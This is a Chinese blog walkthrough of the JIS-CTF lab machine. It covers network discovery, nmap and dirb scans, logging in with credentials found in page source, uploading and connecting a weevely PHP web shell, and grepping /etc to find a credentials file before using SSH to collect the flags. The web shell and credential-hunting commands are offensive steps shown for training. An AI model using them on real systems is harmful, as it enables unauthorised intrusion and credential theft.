渗透之JIS-CTF靶机
攻击环境
攻击机:kali(10.0.10.223)
靶机:在vmbox上(10.0.10.221)
连接设置:两台均为桥接网卡
探嗅目标
netdiscover -i eth0
_____________________________________________________________________________
IPAt MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.20.173.143 54:bf:64:14:77:38 4 240 Unknown vendor
10.0.10.221 08:00:27:68:18:58 1 60 PCS Systemtechnik GmbH
10.0.10.1 08:19:a6:e3:bf:45 2 120 HUAWEI TECHNOLOGIES CO.,LTD
进一步确定10.0.10.221为靶机arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.10.1 08:19:a6:e3:bf:45 HUAWEI TECHNOLOGIES CO.,LTD
10.0.10.82 e8:6a:64:02:fc:6a (Unknown)
10.0.10.107 00:e0:4c:82:ed:6f REALTEK SEMICONDUCTOR CORP.
10.0.10.122 04:92:26:02:04:d7 (Unknown)
10.0.10.204 c8:d9:d2:ea:02:0f (Unknown)
10.0.10.221 08:00:27:68:18:58 CADMUS COMPUTER SYSTEMS
10.0.10.221 08:00:27:68:18:58 CADMUS COMPUTER SYSTEMS (DUP: 2)
nmap走一波nmap -sS 10.0.10.221
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-02 12:18 CST
Nmap scan report for 10.0.10.221
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
可以看到开放了22端口和80端口,那就打开浏览器看一下这个80有什么,加载有点久不知道为啥
![[外链图片转存失败(img-LDbEG7xu-1567427282974)(tu\1.png)]](https://img-blog.csdnimg.cn/20190902202657804.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMjM1NzAz,size_16,color_FFFFFF,t_70)
现在手上没有用户名密码,源码也查不出什么东西,那干脆扫目录好了dirb http://10.0.10.221/
By The Dark Raver
-----------------
START_TIME: Mon Sep 2 12:32:42 2019
URL_BASE: http://10.0.10.221/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.10.221/ ----
==> DIRECTORY: http://10.0.10.221/admin_area/
==> DIRECTORY: http://10.0.10.221/assets/
==> DIRECTORY: http://10.0.10.221/css/
==> DIRECTORY: http://10.0.10.221/flag/
+ http://10.0.10.221/index.php (CODE:302|SIZE:1228)
==> DIRECTORY: http://10.0.10.221/js/
+ http://10.0.10.221/robots.txt (CODE:200|SIZE:160)
+ http://10.0.10.221/server-status (CODE:403|SIZE:299)
---- Entering directory: http://10.0.10.221/admin_area/ ----
^C> Testing: http://10.0.10.221/admin_area/energy
一扫就会有停不下来的意思,我们可以使用ctrl+c暂停,以为我们已经看到了我们想要的东西,扫出来一个flag文件夹,于是我们就访问10.0.10.221/flag/,得到第一个flag
![[外链图片转存失败(img-4hQzvBx2-1567427282974)(tu\2.png)]](https://img-blog.csdnimg.cn/20190902202722440.png)
开始渗透
感觉开始没头绪,但是返回去看dirb扫描出的目录有一个admin_area目录,进去看看,虽然页面没什么有用的东西,但是我们打开页面源码的时候却得到很多有用的东西,username和password以及第二个flag
username : admin
password : 3v1l_H@ck3r
![[外链图片转存失败(img-Kh7cmM7P-1567427282975)(tu\3.png)]](https://img-blog.csdnimg.cn/20190902202729608.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMjM1NzAz,size_16,color_FFFFFF,t_70)
接下来拿着这个username和password去登陆页面登陆,登陆后有一个文件上传的地方,于是我们利用weevely来生成一个木马,这个木马用于上传到靶机
weevely generate shell /root/shell.php
![[外链图片转存失败(img-EiySf278-1567427282975)(tu\4.png)]](https://img-blog.csdnimg.cn/2019090220273645.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMjM1NzAz,size_16,color_FFFFFF,t_70)
然后上传,看到succee已经是上传成功
![[外链图片转存失败(img-3SEqZ0ac-1567427282975)(tu\5.png)]](https://img-blog.csdnimg.cn/20190902202743153.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMjM1NzAz,size_16,color_FFFFFF,t_70)
上传木马之后就是连接木马,但是上传文件之后有将会面临修改名称或者其他操作来阻止用户访问;之前扫描目录的时候有一个robots的文件夹,里面有一个目录,uploads应该就是用来存放上传文件的,所以试着去访问一下
![[外链图片转存失败(img-MC9fxGbX-1567427282976)(tu\6.png)]](https://img-blog.csdnimg.cn/20190902202804510.png)
![[外链图片转存失败(img-cXpI31HP-1567427282976)(tu\7.png)]](https://img-blog.csdnimg.cn/20190902202810163.png)
发现是可以访问的,没有404,说明可以访问我们的木马,紧接着我们连接我们的木马
weevely http://10.0.10.221/uploaded_files/shell.php shell
![[外链图片转存失败(img-XU304Ger-1567427282976)(tu\8.png)]](https://img-blog.csdnimg.cn/20190902202815449.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMjM1NzAz,size_16,color_FFFFFF,t_70)
往上翻翻然后再ls遍历出来就可以看到flag.txt,意外的是flag.txt我们是没有权限访问的,接着看下去有一个hint.txt,打开进去拿到第三个flag,同时也提示了下一步如何操作
www-data@Jordaninfosec-CTF01:/var/www/html $ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)
The 3rd flag is : {7645110034526579012345670}
英文翻译过来就是让我们去找technawi用户的密码然后读取flag.txt,这个东西在一个很隐蔽的地方,既然这个technawi是用户,那就看一下用户列表,technawi也在里面
![[外链图片转存失败(img-tzcg4QGg-1567427282977)(tu\9.png)]](https://img-blog.csdnimg.cn/20190902202822385.png)
接下来就是在etc文件中搜索这个包含technawi关键字的文件了
grep -rns technawi /etc/
www-data@Jordaninfosec-CTF01:/ $ grep -rns technawi /etc/
/etc/subgid:3:technawi:165536:65536
/etc/mysql/conf.d/credentials.txt:3:username : technawi
/etc/subuid:3:technawi:165536:65536
/etc/passwd:30:technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
/etc/group:5:adm:x:4:syslog,technawi
/etc/group:18:cdrom:x:24:technawi
/etc/group:21:sudo:x:27:technawi
/etc/group:23:dip:x:30:technawi
/etc/group:35:plugdev:x:46:technawi
/etc/group:49:lxd:x:110:technawi
/etc/group:54:technawi:x:1000:
/etc/group:55:lpadmin:x:115:technawi
/etc/group:56:sambashare:x:116:technawi
看到了第三行,这个还是比较吸引人的一个文件,抓来看看,一抓就抓出flag,顺带了users和passwword
![[外链图片转存失败(img-Y2h2Rc4Z-1567427282977)(tu\10.png)]](https://img-blog.csdnimg.cn/20190902202828924.png)
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor
得到了用户名和密码那就打开ssh连接,连接成功后就急着ls,但是什么都没有,仔细想想,原来打不开的flag,就是这个,往上翻出打不开flag.txt的路径然后cd就可以打开了,或者直接cat+路径+文件就好了
![[外链图片转存失败(img-DFEYPzEr-1567427282977)(tu\11.png)]](https://img-blog.csdnimg.cn/20190902202842552.png)
总结
这一连串下来的操作也不难,同样的套路,探嗅目标然后再一步一步渗透,见招拆招,对于新手还是挺友好的,想要渗透环境的同学可以直接私聊我或者加我秋秋:804537102
427
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
